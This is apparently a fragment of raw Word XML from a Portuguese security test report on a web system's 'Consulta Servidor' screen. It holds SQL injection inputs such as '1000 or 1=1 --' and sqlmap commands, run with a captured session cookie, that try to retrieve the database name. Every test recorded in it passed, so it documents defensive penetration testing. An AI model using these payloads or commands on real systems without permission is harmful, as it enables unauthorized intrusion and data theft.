          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1000’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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste. A aplicação realizou o tratamento de dados de entrada e não permitiu</w:t>
      </w:r>
      <w:r w:rsidRPr="00985A8F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> a injeção de instruções SQL através do campo de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00934569">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Siape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00985A8F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 2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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Inserir um texto com uma distribuição adequada de aspa simples e comentários inline como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="0063700A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Siape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao siape de usuários cadastrados. Comentários inline foram utilizados na tentativa de forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.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 xml:space="preserve">Entradas: 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 xml:space="preserve">1000 or 1=1 # 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 xml:space="preserve">1000 or 1=1  -- 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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.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  <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00384E80" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tela Consulta Servidor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00384E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exploração via Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00384E80" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1821"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28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>Tarefa realizada nos dias 19, 20 e 22/04/16.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>Duração: 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>oras</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> e 30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>utos</w:t>
      </w:r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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo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>Utilizar a ferramenta S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>qlma</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>p para automatizar o processo de detecção de vulnerabilidades na tela de Consulta Servidor a partir de injeção de códigos SQL.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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultados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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 1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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Verificar se a tela </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Consulta Servidor é vulnerável a injeção de código SQL e caso haja vulnerabilidade conseguir obter o nome do banco de dados utilizado pelo sistema.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>Para realizar essa tentativa foi necessário utilizar a ferramenta Burp Suite para capturar as informações de cookie contidas no cabeçalho HTTP de uma requisição no momento em que a página d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consulta Servidor é acessada.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Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A2041" w:rsidRDefault="009A2041" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0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        </w:t>
      </w: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5400040" cy="4060190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23.jpe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3A39F6" w:rsidRDefault="009A2041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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Figura 23</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Parâ</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>metros obtidos através do Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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 xml:space="preserve">Entrada: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00654DEF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654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">./sqlmap.py -u "http://IP_do_servidor/vacina/index.php?pg=servidores" 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 xml:space="preserve">--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db 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FF1C9C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“./sqlmap.py” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF1C9C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“-u” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>especifica</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF1C9C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“--cookie” especifica </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">um cookie de sessão válido a ser passado para o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“--current -db”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9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utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF1C9C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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se que a tela de Consulta servidor não fosse vulnerável à injeção de SQL e consequentemente não fosse possível descobrir o nome do banco de dados utilizado pela aplicação.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noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Passou no teste. Não possível encontr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ar vulnerabilidade na página e </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> As figuras 23 e 24 mostram os resultados do Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00022ED2" w:rsidP="00022ED2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  <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="001C4F4D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4054475"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175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4.jpe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3A39F6" w:rsidRDefault="009A2041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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Figura 24</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Resultado exploração SQL Injection via Sqlmap – Parte 1.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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F04EFF" w:rsidRDefault="00F04EFF" w:rsidP="001C4F4D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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5428615" cy="4064635"/>
            <wp:effectExtent l="0" t="0" r="635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25.jpe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8615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3A39F6" w:rsidRDefault="009A2041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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figura 25</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Resultado exploração SQL Injection via Sqlmap – Parte 2.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 2</w:t>
      </w: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  <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Repetir a ação da tentativa 2 e aumentar o nível de heurística </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>aplicada pelo Sqlmap na injeção de SQL para o valor máximo: 5.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 xml:space="preserve">Entrada: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00654DEF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654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">./sqlmap.py -u "http://IP_do_servidor/vacina/index.php?pg=servidores" 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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF1C9C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“./sqlmap.py” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF1C9C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“-u” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>especifica</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF1C9C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“--cookie” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>especifica</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> um cookie de sessão válido a ser passado para o SQL MAP durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“--current -db”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> comando utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> “--l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>evel 5” comando utilizado para aumentar o nível da heurística utilizada</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> no escaneamento.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Arial" w:hAnsi="Arial" w:cs="Arial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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se que a tela Consulta Servidor não fosse vulnerável à injeção de SQL e consequentemente não fosse possível descobrir o nome do banco de dados utilizado pela aplicação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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Passou no te</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ste. Mesmo aumentando o nível da</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="pt"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1416"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="005F6E06" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="Pargrafoda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993" w:hanging="284"/>
        <w:jc w:val="both"/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b/>
          <w:sz w:val="32"/>
        </w:rPr>
